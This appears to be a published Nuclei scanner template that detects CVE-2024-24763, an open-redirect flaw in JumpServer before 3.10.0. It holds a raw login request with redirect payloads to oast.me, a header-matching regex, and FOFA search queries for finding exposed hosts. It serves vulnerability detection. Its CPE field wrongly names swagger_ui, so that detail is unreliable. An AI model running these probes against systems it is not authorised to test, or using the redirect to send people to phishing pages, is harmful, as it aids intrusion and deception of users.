JumpServer is an open source bastion host and an operation and maintenance security audit system. Prior to version 3.10.0, attackers can exploit this vulnerability to construct malicious links, leading users to click on them, thereby facilitating phishing attacks or cross-site scripting attacks. Version 3.10.0 contains a patch for this issue. No known workarounds are available.
PoC代码[已公开]
id: CVE-2024-24763
info:
name: JumpServer < 3.10.0 - Open Redirect
author: ritikchaddha
severity: medium
description: |
JumpServer is an open source bastion host and an operation and maintenance security audit system. Prior to version 3.10.0, attackers can exploit this vulnerability to construct malicious links, leading users to click on them, thereby facilitating phishing attacks or cross-site scripting attacks. Version 3.10.0 contains a patch for this issue. No known workarounds are available.
reference:
- https://github.com/jumpserver/jumpserver/security/advisories/GHSA-p2mq-cm25-g4m5
- https://nvd.nist.gov/vuln/detail/CVE-2024-24763
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L
cvss-score: 4.3
cve-id: CVE-2024-24763
cwe-id: CWE-601
epss-score: 0.26411
epss-percentile: 0.96144
cpe: cpe:2.3:a:smartbear:swagger_ui:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: fit2cloud
product: jumpserver
fofa-query:
- title="JumpServer"
- title="jumpserver"
tags: cve2024,cve,jumpserver,redirect,fit2cloud,authenticated
http:
- raw:
- |
POST /{{paths}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username={{username}}&password={{password}}
payloads:
paths:
- "core/auth/login/?next=//oast.me"
- "auth/login/?next=//oast.me"
- "login/?next=//oast.me"
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?oast\.me(?:\s*?)$'
# digest: 4a0a004730450220552346f1456cf110fe87839ef555fdce5780623e291a3988d2a2917e8eaa06f3022100834ef3b56c984db4d2e166f12a62f0c1fb41fe1fb871f2e511ca749ef782c042:922c64590222798bb761d5b6d8e72950